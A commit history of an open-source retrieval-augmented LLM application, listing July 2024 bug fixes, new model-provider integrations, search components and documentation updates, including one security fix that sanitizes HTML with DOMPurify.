Co-authored-by: lijianyong <lijianyong@stepfun.com>
2024-07-24 10:49:37 +08:00
80d703f9c2 fix: fetch the file list after uploading the file by @tanstack/react-query #1306 (#1654)
### What problem does this PR solve?
fix: fetch the file list after uploading the file by
@tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 17:53:15 +08:00
022afbb39d fix: remove unused libraries #1306 (#1649)
### What problem does this PR solve?
fix: remove unused libraries  #1306


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 15:03:58 +08:00
792a1a9d91 add password reset function by extending the Flask command (#1632)
### What problem does this PR solve?
add password reset function by extending the Flask command. #1200 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-23 14:02:41 +08:00
d2b70e73dd fix redis no such key (#1647)
### What problem does this PR solve?
fix Redis no such key #1614

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Signed-off-by: seaver <zhudan187@qq.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-23 14:00:31 +08:00
37b0829e28 refine readme, update updates (#1648)
### What problem does this PR solve?



### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-07-23 13:59:20 +08:00
b4a281eca1 add support for NVIDIA llm (#1645)
### What problem does this PR solve?

add support for NVIDIA llm
### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-23 10:43:09 +08:00
95821f6fb6 fix bug of ragflowdocxpparser (#1642)
### What problem does this PR solve?

#1627

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-23 09:25:32 +08:00
bf2ea04d02 fix: fetch file list by react-query #1306 (#1640)
### What problem does this PR solve?

fix: fetch file list by react-query #1306 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 19:29:20 +08:00
H
ac7a0d4fbf Add ParsertType Audio (#1637)
### What problem does this PR solve?

#1514 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 19:17:30 +08:00
9f109adf28 Add information form (#1636)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-07-22 16:14:40 +08:00
cf12c3cc1f fix: reference file with 'docx' type can not open #844 (#1635)
### What problem does this PR solve?

fix: reference file with 'docx' type can not open #844

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 15:54:15 +08:00
H
29a7b7a040 Add sequence2txt model.py (#1633)
### What problem does this PR solve?

#1514 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 14:52:08 +08:00
eb42adc818 fix: the content in the chunk card will overflow #1628 (#1629)
### What problem does this PR solve?
fix: the content in the chunk card will overflow #1628
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-22 13:54:07 +08:00
a4d230f12b add docker-compose-gpu-CN.yml and docker-compose-gpu-CN-oc9.yml to support gpu (#1618)
### What problem does this PR solve?

add docker-compose-gpu-CN.yml and docker-compose-gpu-CN-oc9.yml to
support gpu
#1558 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-22 09:25:42 +08:00
9352a09c53 modify the encryption to first perform base64 encoding and then encrypt (#1621)
### What problem does this PR solve?

The encryption should first perform base64 encoding and then encrypt, to
maintain consistency with the frontend

#1620 

### Type of change

- [x] Refactoring
2024-07-22 09:24:45 +08:00
a0c1d83ddc update quickstart and llm_api_key_setup document (#1615)
### What problem does this PR solve?

update quickstart and llm_api_key_setup document

### Type of change

- [x] Documentation Update

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 18:37:28 +08:00
657019a5a9 feat: support AWS Bedrock #308 (#1617)
### What problem does this PR solve?

feat: support AWS Bedrock #308
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-19 18:36:49 +08:00
H
58df013722 Chat Use CVmodel (#1607)
### What problem does this PR solve?

#1230 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-19 18:36:34 +08:00
347cb61f26 add support for StepFun (#1611)
### What problem does this PR solve?

#1561 

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 16:26:12 +08:00
264303ba98 fix delete selected chunks display wrong (#1612)
### What problem does this PR solve?
This PR solves the problem that when you delete selected chunks, the
chunks can be deleted but Chunk Number doesn't change. Now you delete
one chunk, the Chunk Number is reduced by one, delete two chunks, the
Chunk Number is reduced by two...
#900


### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-19 16:25:50 +08:00
1c90c39897 fix: use @tanstack/react-query to get knowledge base data #1306 (#1609)
### What problem does this PR solve?
fix: use @tanstack/react-query to get knowledge base data #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 15:50:44 +08:00
3fcdba1683 add support for LocalAI (#1608)
### What problem does this PR solve?

#762 

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-19 15:50:28 +08:00
H
915354bec9 Fix component exception (#1603)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 13:36:45 +08:00
c0090a1b4f fix function create to slove chunk number wrong (#1604)
### What problem does this PR solve?
fix function create to slove the problem of creating a chunk and
increasing the chunk number by 2.


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue) #900

---------

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-19 13:36:01 +08:00
be6d5b76c3 fix embeding model for Azure (#1601)
### What problem does this PR solve?

#1599

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 09:22:59 +08:00
fb21efd77d fix: after logging out and entering the knowledge base page again, the data before still exists #1306 (#1597)
### What problem does this PR solve?

fix: after logging out and entering the knowledge base page again, the
data before still exists #1306
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-19 09:07:36 +08:00
cf4fff64f8 feat: add PubMed operator #918 (#1589)
### What problem does this PR solve?

feat: modify the translation of baiduDescription #918
feat: add PubMed operator #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 15:45:34 +08:00
0b94376cd4 add docker-compose-gpu.yml to support gpu (#1591)
### What problem does this PR solve?

add docker-compose-gpu.yml to support gpu
#1558

### Type of change
- [x] New Feature (non-breaking change which adds functionality)

---------

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-18 15:45:12 +08:00
2b5812d0a9 fix generate error (#1590)
### What problem does this PR solve?

#1550 #1210 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 14:33:30 +08:00
H
4da3ee400b Add component arxiv (#1587)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 14:08:20 +08:00
H
f8602b5286 Add component pubmed (#1586)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-18 13:42:19 +08:00
fc8a752cd5 fix: Minimax API is error! #1353 (#1585)
### What problem does this PR solve?

fix: Minimax API is error! #1353

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 12:09:25 +08:00
478cd006d6 fix: display total items on chunk list page #900 (#1584)
### What problem does this PR solve?
fix: display total items on chunk list page #900

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 11:38:02 +08:00
H
4d10dbcf95 Fix component debug (#1583)
### What problem does this PR solve?

#1582 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-18 11:20:58 +08:00
43cd455b52 Updated deploy a local llm using IPEX-LLM (#1578)
### What problem does this PR solve?



### Type of change


- [x] Documentation Update
2024-07-18 11:20:15 +08:00
b54d5807f3 [Bug]: IndentationError: unindent does not match any outer indentatio… (#1579)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

[Bug]: IndentationError: unindent does not match any outer indentation
level #1569
2024-07-18 11:00:52 +08:00
58e95f76c1 feat: change all file names to lowercase #1574 (#1575)
### What problem does this PR solve?

feat: change all file names to lowercase #1574

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 19:07:34 +08:00
06fd35d420 fix: new message appears in wrong chat window. #1289 (#1571)
### What problem does this PR solve?
fix: new message appears in wrong chat window. #1289

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 17:08:24 +08:00
4df75ca84e API: Stop parsing (#1556)
### What problem does this PR solve?

Aims to stop the process of parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 17:07:33 +08:00
H
701e5be535 fix requirements.txt (#1570)
### What problem does this PR solve?

#1547 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 15:41:10 +08:00
9ae57eb370 fix MiniMax api error (#1567)
### What problem does this PR solve?

#1353 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-17 15:32:51 +08:00
fe5dd5b70a fix: remove duplicate MessageItem #1289 (#1566)
### What problem does this PR solve?

fix: remove duplicate MessageItem #1289

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 14:49:11 +08:00
H
1015436691 Fix web search and template max tokens (#1564)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 14:19:14 +08:00
H
83c9f1ed39 Add templates/websearch assistant (#1559)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-17 12:30:38 +08:00
e4f4b30ae3 Update deploy_local_llm.md (#1557)
Update the xinference rerank model usage

Update the xinference rerank model usage document

### Type of change

- [x] Documentation Update
2024-07-17 12:29:33 +08:00
9bf6f7c9a0 refine generate (#1562)
### What problem does this PR solve?



### Type of change

- [x] Refactoring
2024-07-17 12:28:54 +08:00
b06957e561 fix emmpty input in graph (#1560)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 11:33:49 +08:00
baeedc699d fix: add group id field to ApiKeyModal #1353 (#1540)
### What problem does this PR solve?

fix: add group id field to ApiKeyModal #1353
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 09:45:10 +08:00
00943dc04a Update the Dockerfile.cuda (#1545)
Fix the `Dockerfile.cuda`, as the `/root/miniconda3/envs/py11/bin/pip`
is not found in the base images.

### What problem does this PR solve?

`/root/miniconda3/envs/py11/bin/pip` is not found in the base images.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-07-17 09:44:18 +08:00
f43cf7c2b0 Update requirements.txt with pybind11 2.13.1 (#1548)
necessary for successful installation of the fasttext==0.9.2 module

### What problem does this PR solve?

Aiming to solve issue #1547 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-17 09:40:41 +08:00
9e1421b77c API Documentation (#1526)
### What problem does this PR solve?

Adds the doc for the newly added API method.

### Type of change


- [x] Documentation Update
2024-07-16 18:07:17 +08:00
13389be3f4 feat: replace open-router.svg #1467 (#1538)
### What problem does this PR solve?

feat: replace open-router.svg #1467

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-16 17:11:37 +08:00
a5306e6345 fix minimax init error (#1537)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 16:55:31 +08:00
99adeabc85 remove dependency (#1536)
### What problem does this PR solve?

#702 
### Type of change
- [x] Refactoring
2024-07-16 16:30:17 +08:00
6a5e1d597c hide referece when disable cite (#1535)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 16:16:19 +08:00
266119bf62 fix: Bulk disable the chunk, the UI still shows they are enabled #1236 (#1534)
### What problem does this PR solve?
fix: Bulk disable the chunk, the UI still shows they are enabled #1236

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 15:26:41 +08:00
75086f41a9 'load llm infomation from a json file and add support for OpenRouter' (#1533)
### What problem does this PR solve?

#1467 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-16 15:19:43 +08:00
3657b1f2a2 fix the tokens error that occurred when adding the xinference model (#1527)
### What problem does this PR solve?

fix the tokens error that occurred when adding the xinference model
#1522 

root@pc-gpu-86-41:~# curl -X 'POST' 'http://127.0.0.1:9997/v1/rerank' -H
'accept: application/json' -H 'Content-Type: application/json' -d '{
"model": "bge-reranker-v2-m3",
"query": "A man is eating pasta.",
"return_documents":"true",
"return_len":"true",
"documents": [
"A man is eating food.",
"A man is eating a piece of bread.",
"The girl is carrying a baby.",
"A man is riding a horse.",
"A woman is playing violin."
]
}'

{"id":"610a8724-3e96-11ef-81ce-08bfb886c012","results":[{"index":0,"relevance_score":0.999574601650238,"document":{"text":"A
man is eating
food."}},{"index":1,"relevance_score":0.07814773917198181,"document":{"text":"A
man is eating a piece of
bread."}},{"index":3,"relevance_score":0.000017700713215162978,"document":{"text":"A
man is riding a
horse."}},{"index":2,"relevance_score":0.0000163753629749408,"document":{"text":"The
girl is carrying a
baby."}},{"index":4,"relevance_score":0.00001631895975151565,"document":{"text":"A
woman is playing
violin."}}],"meta":{"api_version":null,"billed_units":null,"tokens":{"input_tokens":38,"output_tokens":38},"warnings":null}}

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-07-16 15:08:51 +08:00
975798c643 fix: Hundreds of chunks list can't choose page #1238 (#1532)
### What problem does this PR solve?

fix: Hundreds of chunks list can't choose page #1238

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 15:06:38 +08:00
607de74ace fix minimax bug (#1528)
### What problem does this PR solve?

#1353 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 10:55:33 +08:00
2a647162a8 fix bugs about multi input for generate (#1525)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-16 09:28:13 +08:00
H
d4332643c4 fix wikipedia language (#1519)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 19:17:17 +08:00
2ea696934b fix: fixed the issue of error when opening the canvas #918 (#1520)
### What problem does this PR solve?

fix: fixed the issue of error when opening the canvas #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 19:17:03 +08:00
5a6a34cef9 Added supported LLMs (#1517)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-07-15 17:55:52 +08:00
1daa0b4d46 feat: add Wikipedia operator #918 (#1516)
### What problem does this PR solve?

Add Wikipedia operator #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:48:01 +08:00
H
60d406acaa Set wikipedia lang (#1515)
### What problem does this PR solve?



### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:45:40 +08:00
1a6bd437f5 API: show status of parsing (#1504)
### What problem does this PR solve?

show status of parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 17:18:44 +08:00
H
258a10fb74 Add component Wikipedia (#1513)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 16:41:20 +08:00
fdc21ec853 fix: Add Model Providers:Azure-OpenAI error #1402 (#1512)
### What problem does this PR solve?

fix: Add Model Providers:Azure-OpenAI error #1402
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 15:55:04 +08:00
c2693d2f46 fix: fixed the issue that the llm field in the KeywordExtract form had no default value (#1510)
### What problem does this PR solve?
fix: fixed the issue that the llm field in the KeywordExtract form had
no default value

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 15:44:31 +08:00
ca9c9c4e1e feat: remove dagre and elkjs #918 (#1506)
### What problem does this PR solve?

feat: remove dagre and elkjs #918
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-15 14:57:49 +08:00
bafe137502 Fix: Implement DOMPurify to sanitize HTML content before rendering (#1498)
### What problem does this PR solve?

This PR resolves issue #1491 related to HTML Injection and Cross-Site
Scripting (XSS). The issue was caused by the unsafe usage of
`dangerouslySetInnerHTML` without proper sanitization of user input.

### Changes
- Added DOMPurify dependency.
- Updated the following components to use DOMPurify:
-
`web/src/pages/add-knowledge/components/knowledge-chunk/components/chunk-card/index.tsx`
  - `web/src/pages/chat/markdown-content/index.tsx`
-
`web/src/pages/add-knowledge/components/knowledge-setting/category-panel.tsx`

### Type of change

- [x] Other (please describe): Security Fix
2024-07-15 10:24:23 +08:00
2dea8448a6 fix: fixed the issue where parameters of DuckDuckGo could not be saved to the backend after being dragged to the canvas #918 (#1503)
### What problem does this PR solve?

fix: fixed the issue where parameters of DuckDuckGo could not be saved
to the backend after being dragged to the canvas #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-15 10:23:16 +08:00
d9868d0229 fix: fixed the issue where the greeting message could not be displayed when opening the debug window #918 (#1499)
### What problem does this PR solve?

fix: fixed the issue where the greeting message could not be displayed
when opening the debug window #918

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 23:39:07 +08:00
H
38a90c32b2 fix duckduckgo.py (#1497)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 19:43:18 +08:00
eecec7b119 refactor name of duckduckgo (#1496)
### What problem does this PR solve?


### Type of change

- [x] Refactoring
2024-07-12 19:20:12 +08:00
4eeb535946 refine db connection (#1495)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-07-12 18:18:12 +08:00
26de9adb41 refine db connection (#1494)
### What problem does this PR solve?



### Type of change


- [x] Refactoring
2024-07-12 18:11:34 +08:00
0c9a7caa9d feat: add llm Select to KeywordExtractForm #918 (#1492)
### What problem does this PR solve?

feat: add llm Select to KeywordExtractForm #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 17:22:01 +08:00
a5a617b7a3 fix ollama max token issue (#1489)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:37:32 +08:00
H
d5618749c9 Fix baidusearch and duckduckgosearch (#1488)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:28:24 +08:00
de8267cfd7 fix: add message_history_window_size to GenerateForm #1472 (#1487)
### What problem does this PR solve?
fix: add message_history_window_size to  GenerateForm #1472
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 16:11:49 +08:00
740714b79d feat: translate text from DuckDuckGo #918 (#1486)
### What problem does this PR solve?

feat: translate text from DuckDuckGo #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 15:22:36 +08:00
013db9410f feat: modify DuckDuckGo's style #918 (#1485)
### What problem does this PR solve?

feat: modify DuckDuckGo's style #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 15:04:45 +08:00
b96ba6f831 add Gemini key (#1480)
### What problem does this PR solve?

#1036

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-12 13:41:58 +08:00
d29fd52e14 fix bug about divided by zero (#1482)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 12:59:56 +08:00
99f7bbaaa2 fix bugs of rerank model with xinference (#1481)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-12 12:33:37 +08:00
575099df2d feat: add KeywordExtractForm and BaiduForm and DuckDuckGoForm #918 (#1477)
### What problem does this PR solve?
feat: add KeywordExtractForm and BaiduForm and DuckDuckGoForm #918


### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-12 11:37:31 +08:00
ddeac9ab3d added SVG for Groq model model providers (#1470)
#1432  #1447 
This PR adds support for the GROQ LLM (Large Language Model).

Groq is an AI solutions company delivering ultra-low latency inference
with the first-ever LPU™ Inference Engine. The Groq API enables
developers to integrate state-of-the-art LLMs, such as Llama-2 and
llama3-70b-8192, into low latency applications with the request limits
specified below. Learn more at [groq.com](https://groq.com/).
Supported Models


| ID | Requests per Minute | Requests per Day | Tokens per Minute |

|----------------------|---------------------|------------------|-------------------|
| gemma-7b-it | 30 | 14,400 | 15,000 |
| gemma2-9b-it | 30 | 14,400 | 15,000 |
| llama3-70b-8192 | 30 | 14,400 | 6,000 |
| llama3-8b-8192 | 30 | 14,400 | 30,000 |
| mixtral-8x7b-32768 | 30 | 14,400 | 5,000 |

---------

Co-authored-by: paresh0628 <paresh.tuvoc@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-12 09:25:44 +08:00
009e18f094 feat: support xinference rerank model (#1466)
### What problem does this PR solve?

support xinference rerank model
#1455 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-11 18:37:41 +08:00
9c023b6d8c feat: validate the name field of the categorize operator for duplicate names and nulls #918 (#1471)
### What problem does this PR solve?

feat: validate the name field of the categorize operator for duplicate
names and nulls #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 18:22:53 +08:00
2c2b2e0779 API: start parsing (#1377)
### What problem does this PR solve?

Make the document start parsing.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-11 18:19:18 +08:00
8d7fb12305 fix: monitor changes in the data.form field of the categorize and relevant operators and then synchronize them to the edge #918 (#1469)
### What problem does this PR solve?
feat: monitor changes in the table of relevant operators and synchronize
them to the edge #918
feat: fixed the issue of repeated requests when opening the graph page
#918
feat: cache node anchor coordinate information #918
feat: monitor changes in the data.form field of the categorize and
relevant operators and then synchronize them to the edge #918
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 18:01:50 +08:00
7f4c63d102 fix: Delete hardcode (#1464)
### What problem does this PR solve?

After checking the language of the pdf, the line will hardcode the
language into Chinese

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 15:41:31 +08:00
3e9f444e6b add support for Gemini (#1465)
### What problem does this PR solve?

#1036

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-11 15:41:00 +08:00
H
2290c2a2f0 fix pdf_paser char content confusion (#1462)
### What problem does this PR solve?

#1407 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 14:37:55 +08:00
H
dbb8f7b77b fix pdf_parser content confusion (#1458)
### What problem does this PR solve?

#1407 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-11 12:36:55 +08:00
8964817d72 API doc: Correct Base URL and Dataset URL. (#1444)
The correct URL is http://<host_address>/v1/api , not
http://<host_address>/api/v1 .

### What problem does this PR solve?

### Type of change

- [x] Documentation Update

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-10 09:39:27 +08:00
0b950da73f fix no resualt bugs (#1449)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
2024-07-09 19:16:35 +08:00
30b88e2b91 fix no resualt bugs (#1448)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-09 18:06:09 +08:00
fb66b1e726 feat: display the debugging results of each operator in a pop-up window #918 (#1445)
### What problem does this PR solve?

feat: display the debugging results of each operator in a pop-up window
#918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 16:34:59 +08:00
198a8b6592 feat: translate name of operator #918 (#1437)
### What problem does this PR solve?

feat: translate name of operator #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 13:22:37 +08:00
56e3fa2d6a Update README (#1438)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-07-09 13:22:25 +08:00
24f9b17ff6 feat: translate graph and chat text (#1433)
translate graph and chat text
2024-07-09 10:43:52 +08:00
427fb97562 feat: translate the to field #918 (#1435)
### What problem does this PR solve?

feat: translate the to field #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-09 10:30:36 +08:00
3413f43b47 Fixed a docusaurus display issue (#1431)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change


- [x] Documentation Update
2024-07-08 19:30:29 +08:00
f8aa31b159 feat: add bedrock icon (#1430)
### What problem does this PR solve?

feat: add bedrock icon #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 19:14:25 +08:00
669d634d74 empty kb id for templates (#1429)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-07-08 19:10:27 +08:00
59417016a8 feat: translate graph of header #918 (#1428)
### What problem does this PR solve?

feat: translate graph of header #918
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 18:52:13 +08:00
1eb1f7ad33 feat: translate graph list #918 (#1426)
### What problem does this PR solve?

feat: translate graph list #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 18:14:34 +08:00
98295caffe update Minimax and Azure-Openai icon in setting page (#1420)
### What problem does this PR solve?

update Minimax and Azure-Openai  icon in setting page
#1156 #308 #433

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-08 17:55:04 +08:00
f5dc94fc85 feat: highlight the nodes that the workflow passes through #918 (#1423)
### What problem does this PR solve?

feat: highlight the nodes that the workflow passes through #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 17:45:17 +08:00
c889ef6363 examples empty in categorize (#1422)
### What problem does this PR solve?

Examples empty in categorize

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 17:40:50 +08:00
593c20889d update docs for release 0.8.0 (#1419)
### What problem does this PR solve?

update docs for release 0.8.0

### Type of change

- [x] Documentation Update

---------

Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
2024-07-08 17:06:33 +08:00
fce3f6df8e feat: when Categorize establishes a connection with other operators, it adds the target node to the to field. #918 (#1418)
### What problem does this PR solve?
feat: when Categorize establishes a connection with other operators, it
adds the target node to the to field. #918

feat: modify the Chinese text of loop #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 16:29:54 +08:00
H
61557a101a fix botocore (#1414)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 16:20:19 +08:00
1f967191d4 feat: add icon to title of operator form #918 (#1413)
### What problem does this PR solve?
feat: add icon to title of operator form #918


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 12:32:46 +08:00
0f597b9817 feat: node cannot connect to itself #918 (#1412)
### What problem does this PR solve?

feat: node cannot connect to itself #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 11:42:12 +08:00
1cff117dc9 feat: translate graph #918 (#1411)
### What problem does this PR solve?

feat: translate graph #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-08 10:55:10 +08:00
H
e3f5464457 fix duckduckgosearch.py bug (#1410)
### What problem does this PR solve?

fix duckduckgosearch.py bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 10:33:26 +08:00
H
6144a109ab Add Support for AWS Bedrock (#1408)
### What problem does this PR solve?

#308 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-07-08 09:37:34 +08:00
b3ebc66b13 be more specific for error message (#1409)
### What problem does this PR solve?

#918 

### Type of change

- [x] Refactoring
2024-07-08 09:32:44 +08:00
dcb3fb2073 fix: use user-defined rerank model's top_k parameter when knowledge Q&A conversation (#1396)
### What problem does this PR solve?

During knowledge Q&A conversations, the user-defined rerank model's
top_k parameter was not used

#1395 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-08 09:25:49 +08:00
H
f4674ae9d0 add Duckduckgo pkg (#1392)
### What problem does this PR solve?

#918 

### Type of change

- [x] Documentation Update
2024-07-08 09:22:50 +08:00
de610091eb feat: after deleting the edge, set the corresponding field in the node's form field to undefined #918 (#1393)
### What problem does this PR solve?

feat: after deleting the edge, set the corresponding field in the node's
form field to undefined #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 19:08:00 +08:00
d57a68bc2a feat: add duckduckgo icon #918 (#1391)
### What problem does this PR solve?
feat: add duckduckgo icon #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-05 16:59:04 +08:00
H
a2eb0df875 Duckduckgosearch (#1388)
### What problem does this PR solve?

#918 

